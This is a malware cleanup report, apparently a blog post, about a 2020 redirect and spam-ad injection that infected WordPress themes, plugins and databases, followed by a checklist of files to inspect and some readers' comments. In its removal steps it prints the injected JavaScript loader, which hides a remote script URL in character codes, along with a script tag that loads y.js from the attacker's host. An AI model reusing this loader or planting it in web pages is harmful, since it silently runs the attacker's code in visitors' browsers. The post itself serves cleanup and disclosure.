MALWARE ANALYSIS REPORT - April 2020
Updated May 2020: Wordfence blog team revealed in May 2020 about the attacker and compromised sites you can read more here
As WordPress is becoming a popular CMS for most user's these days new hacks are coming onto the scene. Over the weekend I helped a lady with her websites that suffered an attack. Here is what I put together as I couldn't find any documentation about the hack at the time online.
WHAT WAS IT?
REDIRECT SPAM ADVERTISEMENT INJECTION INFECTS LARGE AMOUNTS OF WORDPRESS FILES AND THEMES, PLUGINS AND THE DATABASE
DRIVE-BY SEO REDIRECT AD INJECTION
Job undertaken for a client, the main site was infected and other site's on the shared hosting also became infected.
SCOPE
RESTORED 4 WORDPRESS SITES That became vulnerable from Fastracks and track statistics payload
REMOVED 3 SITES NO LONGER IN USE
INFECTION INCLUDED A MALICIOUS REDIRECT PAYLOAD - INFECTING THE FOLLOWING - WP -THEMES, PLUGINS, DATABASE
STEPS FOR REMOVAL
Step 1 - Remove - Search for the following string. and Javascript payload, malicious links
Step 2 - Remove
var jgfjfghkfdrse423 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,100,101,115,116,46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
} -slide - xml-hint.js
Step 3 - Remove
inside database backup .SQL
Script tag containing https://dest.collectfasttracks.com/y.js
**script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'>
Remove following script code and replace with blank
FILES IN QUESTION
SEARCH FOR
Y.JS
VAR
var_0xaae55=["","\x7A\x7F\x74\x7E","\x62\x75\x66\x75\x62\x63\x75","\x63\x60\x7C\x79\x64","\x3E\x..
LINKS FOR WORDPRESS TECHNIQUES AND REFERENCE FOR INVESTIGATIONS
wordpress-malware-redirect-hack-cleanup
wordpress-files-hacked-wp-config-php-hack/
removing-malicious-redirects-site
Sucuri - how to clean hacked WordPress websites
ASKWPGIRL -remove-malware-wordpress-site
Areas to inspect during an infected website
Check Core WordPress Files
Check index.php
Check index.html
Check .htaccess file
Check theme files
Check header.php ( themes folder)
Check footer.php (themes folder)
Check functions.php (themes folder)
Look for adminer script or any other suspicious file names similar.: look for a file named ‘adminer.php’
Locate backdoor
Check for Fake or hidden admin users: Go to the wp_users table of the
Check for both .js and .json files
Server side - Configuration / HTACCESS
However, when under attack these features can be used to harvest clicks for the attacker. Often, the.htaccess file is injected with malicious code to redirect users. Sometimes it’s used to display spam.
Real-life written removal procedure and removal and analysis in April 2020
Ned
Jose
Thanks for sharing your creative and inspirational post on HIVE!
This post got curated by our fellow curator @tibfox and you received a 100% upvote from our non-profit curation service!
Join the official DIYHub community on HIVE and show us more of your amazing work!
Thanks for including link to our blog https://secure.wphackedhelp.com/blog/ hope you find it useful. Check back for more indepth updated posts
Congratulations @neddykelly! You have completed the following achievement on the Hive blockchain and have been rewarded with new badge(s) :
You can view your badges on your board And compare to others on the Ranking
If you no longer want to receive notifications, reply to this comment with the word
STOP
Support the HiveBuzz project. Vote for our proposal!
Wordfence has written a report on May 13th 2020. The blog article above was written by myself a few weeks before that keeping up with zero-day live threats
the article in reference is shown here via the blog team. https://www.wordfence.com/blog/2020/05/one-attacker-rules-them-all/